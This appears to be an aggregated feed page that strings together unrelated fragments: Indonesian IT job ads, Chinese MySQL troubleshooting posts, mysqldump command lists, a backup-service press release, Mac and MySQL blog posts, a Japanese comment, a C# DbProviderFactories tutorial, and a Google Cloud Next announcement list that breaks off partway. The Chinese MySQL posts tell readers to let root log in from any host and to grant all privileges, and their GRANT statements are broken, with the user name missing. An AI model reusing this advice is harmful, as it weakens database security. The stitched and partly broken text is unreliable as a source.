  • S1 Psikologi / Komunikasi, IPK min 3,0
  • Memiliki kemampuan komunikasi yang baik
  • Menguasai bahasa Inggris min pasif
  • People oriented
  • S1 Hukum, Pria / Wanita, IPK min 2,8
  • Memiliki kemampuan komunikasi yang baik
  • Mengetahui UU No. 13 ttg Ketenagakerjaan
  • Menyukai pekerjaan back office dan teliti

Berkas lamaran lengkap, dapat dikirimkan ke :
TLP. 031 - 5320250

          Lowongan Kerja Software Developer dan System Analyst di PT.SEMIS (GIZITAS)        

Batas pendaftaran: 7 Juli 2012 (Lihat Info)
Penempatan kerja: Semarang

PT. SEMISis a service oriented company that offers end-to-end Information Technology ( IT ) management and consulting. We provide complete business solutions that leverage industry standard technologies to establish the competitive advantage of our Customers. Please visit our website at www.ptsemis.com for more information.

we have immediate openings for the following positions :
  • Bs/S1 degree equivalent - preferably in Computer Science / Information Technology, Computer Engineering. Industrial Engineering, Mathematics, Science & Technology or equivalent
  • Fresh graduate applicants are encouraged to apply
  • Good interpersonal and commmunication skill
  • Highly motivated and willing to work hard
  • Working knowledge of HTML and JavaScript
  • Working knowledge of RDBMS ( Oracle, SQL server or MYSQL )
  • Working knowledge in Software development with ASP.NET, VB,NET/C# or coldFusion/PHP
  • BS/S1 degree or equivalent
  • Fresh graduate applicants are encouraged to apply
  • Good interpersonal and communication skill
  • Highly motivated and willing to work hard
  • Ability to take instruction and requirements in English ( Written / Oral )
  • Has relevant and practical experience in the functional and technical requirements definition and documentation
  • Has relevant and practical experience in System Analysis, Design and Testing
To apply, please submit your current CV, desired position (code) and any supporting documents to :

EMAIL : jobs@ptsemis.com

          Lowongan Kerja Full Stack Developer Cilacap        
Pendidikan minimum Sarjana S1Usia maks 30 tahunDiutamakan laki-lakiMenguasai PHP MySQL HTML Javascript CSSFamiliar dengan WordPressMampu bekerja dibawah tekananMau belajarJujurMandiri/Problem solverBahasa Inggris minimal pasifKemampuan lain yang mendukung akan sangat diperhitungkan

          MYSQL: Convert hex string to integer        
So there’s a few places on the web asking how to do this; while it’s easy to do SELECT x'1fb5'; if you have the hex string stored in a field you can’t do that. The answer is to use CONV() ie SELECT CONV(myhexfield, 16, 10); It’s that simple.
          Lowongan Kerja IT Web Programmer        
Pendidikan min S1 Teknik InformatikaUsia 35 TahunPengalaman min 2 tahun dalam PHPASP.Net dan MySQLmenguasai HTML/CSSJavascript jqueryAbode Photoshopmemiliki pengalaman di PHP Framework seperti Lavarel

          ERROR 1049 (42000): Unknown database 'root' 处理        
命令:mysql  -u root -p root -P 8066 -v -S  /opt/app/DataBase/mysql.sock
报错:ERROR 1049 (42000): Unknown database 'root'
命令的密码参数部分:-p root 修改为-proot 中间没有空格。


疯狂 2013-03-29 11:01 发表评论

          mysql 1130 错误 处理        


今天在用远程连接Mysql服务器的数据库,不管怎么弄都是连接不到,错误代码是1130,ERROR 1130: Host is not allowed to connect to this MySQL server
猜想是无法给远程连接的用户权限问题。结果这样子操作mysql库,即可解决。在本机登入mysql后,更改 “mysql” 数据库里的 “user” 表里的 “host” 项,从”localhost”改称'%'。。
mysql -u root -p
mysql>use mysql;
mysql>select 'host' from user where user='root';
mysql>update user set host = '%' where user ='root';
mysql>flush privileges;
mysql>select 'host'   from user where user='root';



一、通过MySQL-Front或mysql administrator连接mysql的时候发生的这个错误

ERROR 1130: Host ***.***.***.*** is not allowed to connect to this MySQL server


需更改 mysql 数据库里的 user表里的 host项



语法格式:mysql -h host_name -u user_name -p password   (本机的话-h 和host_name可省)


C:\program files\mysql\mysql server 5.0\bin>mysql -u root -p
Enter password:******
先输入用户名和密码登陆要求(-p),回车后等出现"Enter password:",再输入密码回车,这样就可以


Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 1 to server version: 5.0.1-nt

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.



mysql> \s 查看版本信息
mysql> \q or mysql> quit 退出mysql数据库服务器
mysql> \h or mysql> help 查看帮助(其他的数据库服务器相关命令)


mysql>use mysql;

mysql>update user set host = '%'   where user ='root';

mysql>flush privileges;

mysql>select 'host','user' from user where user='root';








MySQL 用户帐号的修改 error 11302007-09-07 09:18

MySQL上的一个数据库要备份,装了个MySQL的gui工具。打开"MySQL Administrator"工具,填好用户名和密码却登录不了,老是报这个错“ERROR 1130: Host 'lijuan-' is not allowed to connect to this MySQL server”。网上查了下,有这两个方法解决: 解决方法:
1。 改表法。可能是你的帐号不允许从远程登陆,只能在localhost。这个时候只要在localhost的那台电脑,登入mysql后,更改 "mysql" 数据库里的 "user" 表里的 "host" 项,从"localhost"改称"%"
mysql -u root -pvmwaremysql>use mysql;mysql>update user set host = '%' where user = 'root';mysql>select host, user from user;
2. 授权法。例如,你想myuser使用mypassword从任何主机连接到mysql服务器的话。
GRANT ALL PRIVILEGES ON *.* TO IDENTIFIED BY 'mypassword' WITH GRANT OPTION; 如果你想允许用户myuser从ip为192.168.1.3的主机连接到mysql服务器,并使用mypassword作为密码 GRANT ALL PRIVILEGES ON *.* TO IDENTIFIED BY 'mypassword' WITH GRANT OPTION;      我的mysql.user里root用户的host果然是localhost,先用改表法给localhost改成“%”,还是不行,仍然报1130的错误,又按“从任何主机连接到mysql服务器”方法授权,还是报一样的错,最后给自己的ip授权之后,终于登录上了。。。。


mysql的ERROR 1045 在上面情况后如再出现客户段1045可在服务器执行如下

UPDATE user SET Password=PASSWORD('123456') where USER='myuser';

疯狂 2013-03-29 10:57 发表评论

          mysql数据库备份和还原常用的命令 .        


mysqldump -hhostname -uusername -ppassword databasename > backupfile.sql


mysqldump -–add-drop-table -uusername -ppassword databasename > backupfile.sql


mysqldump -hhostname -uusername -ppassword databasename | gzip > backupfile.sql.gz


mysqldump -hhostname -uusername -ppassword databasename specific_table1 specific_table2 > backupfile.sql


mysqldump -hhostname -uusername -ppassword –databases databasename1 databasename2 databasename3 > multibackupfile.sql


mysqldump –no-data –databases databasename1 databasename2 databasename3 > structurebackupfile.sql


mysqldump –all-databases > allbackupfile.sql


mysql -hhostname -uusername -ppassword databasename < backupfile.sql


gunzip < backupfile.sql.gz | mysql -uusername -ppassword databasename


mysqldump -uusername -ppassword databasename | mysql –host=*.*.*.* -C databasename

疯狂 2011-09-30 14:29 发表评论

          Lowongan Kerja Web Programmer        
Pria/wanitaLulusan S1 informatika fresh graduate welcomemempunyai pengalaman kerja sbg programmer lebih bagus.Menguasai PHPMysqlAjaxCSSJavascript.IPK min 2.75Menguasai Framework lebih diutamakan.Mampu bekerja dlm team dan menyelesaikan program sesuai tenggat waktu.Jujur dan bertanggungjawab.Mempunyai kendaraan sendiri.Penempatan di daerah Surabaya.

          Lowongan Kerja Junior Developer        
Bachelor Degree from Computer Science or related fieldsHaving passion in programming Java / C HTML and database oracle mysql

          Lowongan Kerja Senior Java Developer        
Bachelor Degree from Computer Science or related fieldsAt least has 2 years working experience developing Java current experienceHaving passion in programmingAt least Intermediate programming skillHave experience and Intermediate analysis skill and database oracle mysqlHave experience ...

          Lowongan Kerja IT Web Developer        
Laki-laki atau perempuanUsia maks. 27 tahunBelum menikahS1 Multimedia/Teknik InformatikaMemiliki pengalaman yang sesuai min. 2 tahun.Memahami HTML dan protokol web.Terampil di SQL berbasis query PHP MySQL atau lainnya flat-file penanganan melalui kode program alat ETL PHP ...

          Lowongan Kerja API Developer        
Having a good Python PHP or Go programming skillsMinimum 1 year experience in the related fieldUnderstand RESTful web API developmentExperience with MySQL Redis or memcached will be a plusFresh Graduates are welcome but shall have ...

          Lowongan Kerja Programmer        
Berpengalaman di bidang pemrogramanMenguasai Menguasai CSS Java ScriptJQuery MySQLPHPMemiliki kemampuan logika dan algoritma yang baikMengenal PHP Framework lebih diutamakanPria/ WanitaFresh Graduate dipersilahkan mendaftarUsia max 30 tahunMampu bekerja di bawah tekanan dan deadlineMampu bekerja dalam timMemiliki ...

          Lowongan Kerja Back End Programmer        
Min Bachelor Degree Information Technology or equivalent2 years minimum relevant working experienceExperienced in HTML CSS PHP MySQL Javascript.Basic understanding of back-end technologies amp platforms Node.JS in particular Good understanding amp proficient knowledge of server-side javascript ...

          Linux Backup Utility Provider Grows Market Share        

Phoenix, AZ -- (SBWIRE) -- 08/17/2011 -- Backup Teddy, the industry leading backup utility for Linux servers continues to experience tremendous growth. As the easiest backup utility available for webmasters and those running Linux, Backup Teddy provides reliable and easy backups to entire servers for regular users who have little Linux experience. It's famed scheduled Backup Teddy utility allows users to safely backup important MySQL databases, PHP files, Apache settings, cron jobs, system settings and more within minutes due to its proven Linux Rsync backup technology.

Even today, 99 percent of existing Linux backup solutions require expert level skills keeping it a difficult task. Backup Teddy's rsync linux backup technology simplifies it all while providing the most efficient means of transferring files from one location to another. The technology allows the company to upload only the changed portions of any multi-gigabyte file to its secure servers. That data is then integrated into its main copy of the file where the local and remote copies are then verified to be 100 percent identical. "We provide the industry's most efficient and fastest way to back up server data and a typical backup 5GB backup takes just five minutes as opposed to hours or days with other solutions," said Peter Barkhal, a Backup Teddy security specialist.

All Backup Teddy accounts come with the provider's backup utility software to enable the process of remotely backing up important data to the company's secure systems in just several easy steps. "Our expert developers have designed our Linux Rsync backup utility to be incredibly easy to use and so compatible that virtually all Linux distributions will have a Backup Teddy schedule set and fully operating in under five minutes," noted Peter. "We still happily setup the customer's first server for free if they want."

Customers can install and run Backup Teddy free of charge on multiple servers with no transfer limits and no wasted bandwidth from their web host or Internet provider. The utility has been tested on more than a dozen Linux distributions and works with both 32bit/64bit Linux systems.

When asked if a Windows version of the service was coming out, Peter replied "I'm not supposed to talk about it, but it's definitely in the works. We will be bringing Backup Teddy to the Microsoft world in a few months once we're happy it's as totally robust as it's Linux counterpart".

All data at Backup Teddy is protected by military-grade security and more than ample redundancy with all data encrypted enroute to the provider's servers. "Server access is restricted to the company's security staff, which prohibits anyone from seeing what customers are backing up," said Peter. Users also have the option to encrypt important databases that only they can personally decrypt, we just tell them to not lose that special password because not even we can get it back for them."

While most providers charge upwards of $300 per month for a less reliable Linux backup with less features, Backup Teddy impressively does far more for far less. The provider's cost-effective plans become cheaper per gigabyte and all plans come with a 30 day money-back guarantee with full support provided seven days a week. To obtain more information on Backup Teddy, please visit http://www.BackupTeddy.com.

For more information on this press release visit: http://www.sbwire.com/press-releases/linux/backup/release-104156.htm

Media Relations Contact

Tom Haywarde
Email: Click to Email Tom Haywarde
Web: http://www.BackupTeddy.com

          Lowongan Kerja Web Programmer        
Minimum Diploma Degree D3 in Information Technology Information System Computer Science or related fresh graduated are welcomeAt least 1 years experience as Application Developer in Web Application Good knowledge of PHP MySQL Javascript PHP web ...

          Lowongan Kerja Junior Programmer        
Degree/Diploma in IT background or related field.Proficiency with HTML5 CSS3 JavaScript PHP MySQL.Good interpersonal skill and work as part of a team.Have the ability to work under pressure and meet deadlines.Fluent in English both oral ...

          Lowongan Kerja Web Developer        
Laki-laki atau perempuanUsia maks. 27 tahunBelum menikahS1 Multimedia/Teknik InformatikaMemiliki pengalaman yang sesuai min. 2 tahun.Memahami HTML dan protokol web.Terampil di SQL berbasis query PHP MySQL atau lainnya flat-file penanganan melalui kode program alat ETL PHP ...

          Lowongan Kerja Java Developer         
Pengalaman minimal 2 tahunBackend Java /PHPUL ExtjsFramrework/JquaeryDB Familier dg Oracle Postgre MySql Query Store Procedure Bisa Membuat Header Detail Transaction User InterfaceFamilier LInux

          Snow Leopard        
Days ago, I ownloaded an app. The installation failed because it is for Snow Leopard. I then realized that Mac OS X 10.6 had been released for a while, actually a year ago. I thought I should upgrade my macbook. It worked great, but should I give Snow Leopard a try?I ordered the DVD and went ahead to upgrade without checking for reviews. The installation took about one hour. Initially it seemed OK. Apps I used daily continued to work, though I didn't notice anything better. I was not sure whether it was running on Snow Leopard. When I started to use other apps, troubles kept coming. Firstly ROR didn't work, then VPN didn't start, and the worst crash. It crashed twice in a day.I so regretted that I upgraded the OS when it crashed 2nd time. Fortunately it didn't take me too long to figure out the root cause and got it fixed. The culprit was growl. The error showing on "console messages" was "attempt to pop an unknown autorelease pool", lots of them, all from growl. The solution is to update growl to the latest 1.2.According to http://www.versiontracker.com/dyn/moreinfo/mac/12696&page=2,VPN client needs a reinstall. Before reinstall, I did uninstall, "sudo /usr/local/bin/vpn_uninstall". Somehow, the new VPN client window didn't pop up even with the reinstall. I learned to start it by command line "vpnclient connect your_profile". Before I figuring out the cause, the problem was gone after a few reboots.The ROR issue was real pain. The error was a "500 Internal Server Error", "uninitialized constant MysqlCompat::MysqlRes", "/Library/Ruby/Gems/1.8/gems/activesupport-2.3.4/lib/active_support/dependencies.rb:440:in `load_missing_constant'". I uninstalled the mysql and installed latest 5.1.47 64 bit version. The error switched to "dyld: lazy symbol binding failed: Symbol not found: _mysql_init". There are many posts on ROR forums about the fixes. Somehow, it took me 2 days to find this excellent post href="http://weblog.rubyonrails.org/2009/8/30/upgrading-to-snow-leopard. Running the following commandsudo env ARCHFLAGS="-arch x86_64" gem install mysql -- --with-mysql-config=/usr/local/mysql/bin/mysql_configROR started to work again. Lesson learned - search on the web to see what others said before install, upgrade any softwares, especially before an OS upgrade.
          MySQL Error 1064        
Seeing following error when adding new records to mysql DB:ERROR 1064 (42000) at line 3: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'read, ......The sql command looks like "insert into table1 (user_id, math, writing, read, ...) values (...". Goggling this error brings up lots of links to forum discussions. I read a few but none tells the root cause. Somehow realized that "read" (a column in table1) is a reserved word in sql. Once I remove this column, this command can be executed without problem. I then quickly resolved this issue by changing column name 'read' to 'reading'. If you want to keep the column name, there are two choices. One is to quote this column name with backtick (“`”):insert into table1 (user_id, math, writing, `read`, ...) values (...If the ANSI_QUOTES SQL mode is enabled, it is also allowable to quote identifiers within double quotes ("SET sql_mode='ANSI_QUOTES'). Or you can prefix the column name with table name:insert into table1 (user_id, math, writing, table1.read, ...) values (...More details can be found in MySQL 5.0 Reference Manual::8.3 Reserved Words and MySQL 5.0 Reference Manual::8.2 Schema Object Names.
          Comment on 「あれ?」と思ったら、確認する。【小さな成長177】 by Shimapoo_jp        
k.sasaki様 コメントをお書きいただき、誠にありがとうございました。 サーバー側のセキュリティ対策をどんどんやっていこうと思います。 WordPressのセキュリティを強化しようと思い、最近iThemes Securityをインストールしました。 しかし、どうやらバックアップの設定がまだよく理解できておらず、それが直接的な原因かはまだ調べきれてはいないのですが、今日の朝からMySQLが起動しなくなってしまい対応に追われていました。 いろいろサイトを回って試してみても原因が分からず、バックアップは手動でとってはあったので、数字を上げるとデータが壊れるとのことだったのですが、innodb_force_recoveryを試してみようと思い1から順番に上げていきました。 3でもだめで、もう何をやってもダメだったので、起動できたら、ダンプして救えるものは救おうとしたのですが、結局6にしても起動できませんでした。 (私と同じように、急にMySQLが起動できなくなってこのコメントにたどり着いた読者の皆様へ innodb_force_recoveryを使うとデータが壊れる可能性があります。 参考サイト http://dev.mysql.com/doc/refman/5.1/ja/forcing-recovery.html もしデータが壊れてしまっても、私は責任はとれません。コマンドの実行は自己責任でお願いします。コマンドを実行する前に、他の可能性を十分に検討して頂ければと思います) もういくら調べても解決できず、起動できない状態が続いたので、MySQLをアンインストールして、最新バージョンをインストールし直すことにしました。 アンインストールまではうまくいったのですが、最新バージョンのインストールでつまずき、でもここでようやく原因が分かってきました。 ディスクの空き容量が、無くなっていたのです。 今まで遭遇したことが無くて、全然気づけませんでした。どこでそんなに使っているのだろうと調べていったところ、先ほど触れたiThemes Securityがここ一週間の間に大量にバックアップをとっていて、全部使い切ってしまっていたのです。 さっそく、iThemes Securityのバックアップファイルを全部削除して、もう一度、MySQLのインストールを行ってみたところ、正常にインストールできて、MySQLの起動とアップデートもできて、無事サイトが生き返りました。 今回の一件は、大変勉強になりました。 k.sasaki様にお書きいただいた内容につきましても、できることから行っていきます。 まだ、サイトを攻撃されるというのが具体的にイメージできていないのですが、アクセスログなどをよく見て、何かおかしな挙動がないか考えてみます。当たり前のことなのですが、もっと自分のシステムの監視ができるようにならなければいけないとつくづく思いました。 まだまだ、知らないことばかりですが、サーバー側のセキュリティ強化についてこれからもっと勉強して、対策を講じていきたいと思います。
          DbProviderFactories: Write database agnostic ADO.NET code        

Recently I needed to write a module that needs to connect to a wide range of SQL-DBs, e.g. MySQL, MS SQL, Oracle etc.

Problem: Most providers will use their concret classes

If you look at the C# example on the MySQL dev page you will see the MsSql-Namespace and classes:

MySql.Data.MySqlClient.MySqlConnection conn;
string myConnectionString;

myConnectionString = "server=;uid=root;" +

    conn = new MySql.Data.MySqlClient.MySqlConnection();
    conn.ConnectionString = myConnectionString;
catch (MySql.Data.MySqlClient.MySqlException ex)

The same classes will probably not work for a MS SQL database.

“Solution”: Use the DbProviderFactories

For example if you install the MySql-NuGet package you will also get this little enhancement to you app.config:

    <remove invariant="MySql.Data.MySqlClient" />
    <add name="MySQL Data Provider" invariant="MySql.Data.MySqlClient" description=".Net Framework Data Provider for MySQL" type="MySql.Data.MySqlClient.MySqlClientFactory, MySql.Data, Version=, Culture=neutral, PublicKeyToken=c5687fc88969c44d" />

Now we can get a reference to the MySql client via the DbProviderFactories:

using System;
using System.Data;
using System.Data.Common;

namespace DbProviderFactoryStuff
    class Program
        static void Main(string[] args)
                Console.WriteLine("All registered DbProviderFactories:");
                var allFactoryClasses = DbProviderFactories.GetFactoryClasses();

                foreach (DataRow row in allFactoryClasses.Rows)
                    Console.WriteLine(row[0] + ": " + row[2]);

                Console.WriteLine("Try to access a MySql DB:");

                DbProviderFactory dbf = DbProviderFactories.GetFactory("MySql.Data.MySqlClient");
                using (DbConnection dbcn = dbf.CreateConnection())
                    dbcn.ConnectionString = "Server=localhost;Database=testdb;Uid=root;Pwd=Pass1word;";
                    using (DbCommand dbcmd = dbcn.CreateCommand())
                        dbcmd.CommandType = CommandType.Text;
                        dbcmd.CommandText = "SHOW TABLES;";

                        // parameter...
                        //var foo = dbcmd.CreateParameter();
                        //foo.ParameterName = "...";
                        //foo.Value = "...";

                        using (DbDataReader dbrdr = dbcmd.ExecuteReader())
                            while (dbrdr.Read())
            catch (Exception exc)



The most important line is this one:

DbProviderFactory dbf = DbProviderFactories.GetFactory("MySql.Data.MySqlClient");

Now with the DbProviderFactory from the MySql client we can access the MySql database without using any MySql-specific classes.

There are a couple of “in-built” db providers registered, like the MS SQL provider or ODBC stuff.

The above code will output something like this:

All registered DbProviderFactories:
Odbc Data Provider: System.Data.Odbc
OleDb Data Provider: System.Data.OleDb
OracleClient Data Provider: System.Data.OracleClient
SqlClient Data Provider: System.Data.SqlClient
Microsoft SQL Server Compact Data Provider 4.0: System.Data.SqlServerCe.4.0
MySQL Data Provider: MySql.Data.MySqlClient

Other solutions

Of course there are other solutions - some OR-Mapper like the EntityFramework have a provider model which might also work, but this one here is a pretty basic approach.

SQL Commands

The tricky bit here is that you need to make sure that your SQL commands work on your database - this is not a silver bullet, it just lets you connect and execute SQL commands to any ‘registered’ database.

The full demo code is also available on GitHub.

Hope this helps.

          100 announcements (!) from Google Cloud Next '17        

San Francisco — What a week! Google Cloud Next ‘17 has come to the end, but really, it’s just the beginning. We welcomed 10,000+ attendees including customers, partners, developers, IT leaders, engineers, press, analysts, cloud enthusiasts (and skeptics). Together we engaged in 3 days of keynotes, 200+ sessions, and 4 invitation-only summits. Hard to believe this was our first show as all of Google Cloud with GCP, G Suite, Chrome, Maps and Education. Thank you to all who were here with us in San Francisco this week, and we hope to see you next year.

If you’re a fan of video highlights, we’ve got you covered. Check out our Day 1 keynote (in less than 4 minutes) and Day 2 keynote (in under 5!).

One of the common refrains from customers and partners throughout the conference was “Wow, you’ve been busy. I can’t believe how many announcements you’ve had at Next!” So we decided to count all the announcements from across Google Cloud and in fact we had 100 (!) announcements this week.

For the list lovers amongst you, we’ve compiled a handy-dandy run-down of our announcements from the past few days:


Google Cloud is excited to welcome two new acquisitions to the Google Cloud family this week, Kaggle and AppBridge.

1. Kaggle - Kaggle is one of the world's largest communities of data scientists and machine learning enthusiasts. Kaggle and Google Cloud will continue to support machine learning training and deployment services in addition to offering the community the ability to store and query large datasets.

2. AppBridge - Google Cloud acquired Vancouver-based AppBridge this week, which helps you migrate data from on-prem file servers into G Suite and Google Drive.


Google Cloud brings a suite of new security features to Google Cloud Platform and G Suite designed to help safeguard your company’s assets and prevent disruption to your business: 

3. Identity-Aware Proxy (IAP) for Google Cloud Platform (Beta) - Identity-Aware Proxy lets you provide access to applications based on risk, rather than using a VPN. It provides secure application access from anywhere, restricts access by user, identity and group, deploys with integrated phishing resistant Security Key and is easier to setup than end-user VPN.

4. Data Loss Prevention (DLP) for Google Cloud Platform (Beta) - Data Loss Prevention API lets you scan data for 40+ sensitive data types, and is used as part of DLP in Gmail and Drive. You can find and redact sensitive data stored in GCP, invigorate old applications with new sensitive data sensing “smarts” and use predefined detectors as well as customize your own.

5. Key Management Service (KMS) for Google Cloud Platform (GA) - Key Management Service allows you to generate, use, rotate, and destroy symmetric encryption keys for use in the cloud.

6. Security Key Enforcement (SKE) for Google Cloud Platform (GA) - Security Key Enforcement allows you to require security keys be used as the 2-Step verification factor for enhanced anti-phishing security whenever a GCP application is accessed.

7. Vault for Google Drive (GA) - Google Vault is the eDiscovery and archiving solution for G Suite. Vault enables admins to easily manage their G Suite data lifecycle and search, preview and export the G Suite data in their domain. Vault for Drive enables full support for Google Drive content, including Team Drive files.

8. Google-designed security chip, Titan - Google uses Titan to establish hardware root of trust, allowing us to securely identify and authenticate legitimate access at the hardware level. Titan includes a hardware random number generator, performs cryptographic operations in the isolated memory, and has a dedicated secure processor (on-chip).


New GCP data analytics products and services help organizations solve business problems with data, rather than spending time and resources building, integrating and managing the underlying infrastructure:

9. BigQuery Data Transfer Service (Private Beta) - BigQuery Data Transfer Service makes it easy for users to quickly get value from all their Google-managed advertising datasets. With just a few clicks, marketing analysts can schedule data imports from Google Adwords, DoubleClick Campaign Manager, DoubleClick for Publishers and YouTube Content and Channel Owner reports.

10. Cloud Dataprep (Private Beta) - Cloud Dataprep is a new managed data service, built in collaboration with Trifacta, that makes it faster and easier for BigQuery end-users to visually explore and prepare data for analysis without the need for dedicated data engineer resources.

11. New Commercial Datasets - Businesses often look for datasets (public or commercial) outside their organizational boundaries. Commercial datasets offered include financial market data from Xignite, residential real-estate valuations (historical and projected) from HouseCanary, predictions for when a house will go on sale from Remine, historical weather data from AccuWeather, and news archives from Dow Jones, all immediately ready for use in BigQuery (with more to come as new partners join the program).

12. Python for Google Cloud Dataflow in GA - Cloud Dataflow is a fully managed data processing service supporting both batch and stream execution of pipelines. Until recently, these benefits have been available solely to Java developers. Now there’s a Python SDK for Cloud Dataflow in GA.

13. Stackdriver Monitoring for Cloud Dataflow (Beta) - We’ve integrated Cloud Dataflow with Stackdriver Monitoring so that you can access and analyze Cloud Dataflow job metrics and create alerts for specific Dataflow job conditions.

14. Google Cloud Datalab in GA - This interactive data science workflow tool makes it easy to do iterative model and data analysis in a Jupyter notebook-based environment using standard SQL, Python and shell commands.

15. Cloud Dataproc updates - Our fully managed service for running Apache Spark, Flink and Hadoop pipelines has new support for restarting failed jobs (including automatic restart as needed) in beta, the ability to create single-node clusters for lightweight sandbox development, in beta, GPU support, and the cloud labels feature, for more flexibility managing your Dataproc resources, is now GA.


New GCP databases and database features round out a platform on which developers can build great applications across a spectrum of use cases:

16. Cloud SQL for Postgre SQL (Beta) - Cloud SQL for PostgreSQL implements the same design principles currently reflected in Cloud SQL for MySQL, namely, the ability to securely store and connect to your relational data via open standards.

17. Microsoft SQL Server Enterprise (GA) - Available on Google Compute Engine, plus support for Windows Server Failover Clustering (WSFC) and SQL Server AlwaysOn Availability (GA).

18. Cloud SQL for MySQL improvements - Increased performance for demanding workloads via 32-core instances with up to 208GB of RAM, and central management of resources via Identity and Access Management (IAM) controls.

19. Cloud Spanner - Launched a month ago, but still, it would be remiss not to mention it because, hello, it’s Cloud Spanner! The industry’s first horizontally scalable, globally consistent, relational database service.

20. SSD persistent-disk performance improvements - SSD persistent disks now have increased throughput and IOPS performance, which are particularly beneficial for database and analytics workloads. Read these docs for complete details about persistent-disk performance.

21. Federated query on Cloud Bigtable - We’ve extended BigQuery’s reach to query data inside Cloud Bigtable, the NoSQL database service for massive analytic or operational workloads that require low latency and high throughput (particularly common in Financial Services and IoT use cases).


New GCP Cloud Machine Learning services bolster our efforts to make machine learning accessible to organizations of all sizes and sophistication:

22.  Cloud Machine Learning Engine (GA) - Cloud ML Engine, now generally available, is for organizations that want to train and deploy their own models into production in the cloud.

23. Cloud Video Intelligence API (Private Beta) - A first of its kind, Cloud Video Intelligence API lets developers easily search and discover video content by providing information about entities (nouns such as “dog,” “flower”, or “human” or verbs such as “run,” “swim,” or “fly”) inside video content.

24. Cloud Vision API (GA) - Cloud Vision API reaches GA and offers new capabilities for enterprises and partners to classify a more diverse set of images. The API can now recognize millions of entities from Google’s Knowledge Graph and offers enhanced OCR capabilities that can extract text from scans of text-heavy documents such as legal contracts or research papers or books.

25. Machine learning Advanced Solution Lab (ASL) - ASL provides dedicated facilities for our customers to directly collaborate with Google’s machine-learning experts to apply ML to their most pressing challenges.

26. Cloud Jobs API - A powerful aid to job search and discovery, Cloud Jobs API now has new features such as Commute Search, which will return relevant jobs based on desired commute time and preferred mode of transportation.

27. Machine Learning Startup Competition - We announced a Machine Learning Startup Competition in collaboration with venture capital firms Data Collective and Emergence Capital, and with additional support from a16z, Greylock Partners, GV, Kleiner Perkins Caufield & Byers and Sequoia Capital.


New GCP pricing continues our intention to create customer-friendly pricing that’s as smart as our products; and support services that are geared towards meeting our customers where they are:

28. Compute Engine price cuts - Continuing our history of pricing leadership, we’ve cut Google Compute Engine prices by up to 8%.

29. Committed Use Discounts - With Committed Use Discounts, customers can receive a discount of up to 57% off our list price, in exchange for a one or three year purchase commitment paid monthly, with no upfront costs.

30. Free trial extended to 12 months - We’ve extended our free trial from 60 days to 12 months, allowing you to use your $300 credit across all GCP services and APIs, at your own pace and schedule. Plus, we’re introduced new Always Free products -- non-expiring usage limits that you can use to test and develop applications at no cost. Visit the Google Cloud Platform Free Tier page for details.

31. Engineering Support - Our new Engineering Support offering is a role-based subscription model that allows us to match engineer to engineer, to meet you where your business is, no matter what stage of development you’re in. It has 3 tiers:

  • Development engineering support - ideal for developers or QA engineers that can manage with a response within four to eight business hours, priced at $100/user per month.
  • Production engineering support provides a one-hour response time for critical issues at $250/user per month.
  • On-call engineering support pages a Google engineer and delivers a 15-minute response time 24x7 for critical issues at $1,500/user per month.

32. Cloud.google.com/community site - Google Cloud Platform Community is a new site to learn, connect and share with other people like you, who are interested in GCP. You can follow along with tutorials or submit one yourself, find meetups in your area, and learn about community resources for GCP support, open source projects and more.


New GCP developer platforms and tools reinforce our commitment to openness and choice and giving you what you need to move fast and focus on great code.

33. Google AppEngine Flex (GA) - We announced a major expansion of our popular App Engine platform to new developer communities that emphasizes openness, developer choice, and application portability.

34. Cloud Functions (Beta) - Google Cloud Functions has launched into public beta. It is a serverless environment for creating event-driven applications and microservices, letting you build and connect cloud services with code.

35. Firebase integration with GCP (GA) - Firebase Storage is now Google Cloud Storage for Firebase and adds support for multiple buckets, support for linking to existing buckets, and integrates with Google Cloud Functions.

36. Cloud Container Builder - Cloud Container Builder is a standalone tool that lets you build your Docker containers on GCP regardless of deployment environment. It’s a fast, reliable, and consistent way to package your software into containers as part of an automated workflow.

37. Community Tutorials (Beta)  - With community tutorials, anyone can now submit or request a technical how-to for Google Cloud Platform.


Secure, global and high-performance, we’ve built our cloud for the long haul. This week we announced a slew of new infrastructure updates. 

38. New data center region: California - This new GCP region delivers lower latency for customers on the West Coast of the U.S. and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

39. New data center region: Montreal - This new GCP region delivers lower latency for customers in Canada and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

40. New data center region: Netherlands - This new GCP region delivers lower latency for customers in Western Europe and adjacent geographic areas. Like other Google Cloud regions, it will feature a minimum of three zones, benefit from Google’s global, private fibre network, and offer a complement of GCP services.

41. Google Container Engine - Managed Nodes - Google Container Engine (GKE) has added Automated Monitoring and Repair of your GKE nodes, letting you focus on your applications while Google ensures your cluster is available and up-to-date.

42. 64 Core machines + more memory - We have doubled the number of vCPUs you can run in an instance from 32 to 64 and up to 416GB of memory per instance.

43. Internal Load balancing (GA) - Internal Load Balancing, now GA, lets you run and scale your services behind a private load balancing IP address which is accessible only to your internal instances, not the internet.

44. Cross-Project Networking (Beta) - Cross-Project Networking (XPN), now in beta, is a virtual network that provides a common network across several Google Cloud Platform projects, enabling simple multi-tenant deployments.


In the past year, we’ve launched 300+ features and updates for G Suite and this week we announced our next generation of collaboration and communication tools.

45. Team Drives (GA for G Suite Business, Education and Enterprise customers) - Team Drives help teams simply and securely manage permissions, ownership and file access for an organization within Google Drive.

46. Drive File Stream (EAP) - Drive File Stream is a way to quickly stream files directly from the cloud to your computer With Drive File Steam, company data can be accessed directly from your laptop, even if you don’t have much space on your hard drive.

47. Google Vault for Drive (GA for G Suite Business, Education and Enterprise customers) - Google Vault for Drive now gives admins the governance controls they need to manage and secure all of their files, including employee Drives and Team Drives. Google Vault for Drive also lets admins set retention policies that automatically keep what’s needed and delete what’s not.

48. Quick Access in Team Drives (GA) - powered by Google’s machine intelligence, Quick Access helps to surface the right information for employees at the right time within Google Drive. Quick Access now works with Team Drives on iOS and Android devices, and is coming soon to the web.

49. Hangouts Meet (GA to existing customers) - Hangouts Meet is a new video meeting experience built on the Hangouts that can run 30-person video conferences without accounts, plugins or downloads. For G Suite Enterprise customers, each call comes with a dedicated dial-in phone number so that team members on the road can join meetings without wifi or data issues.

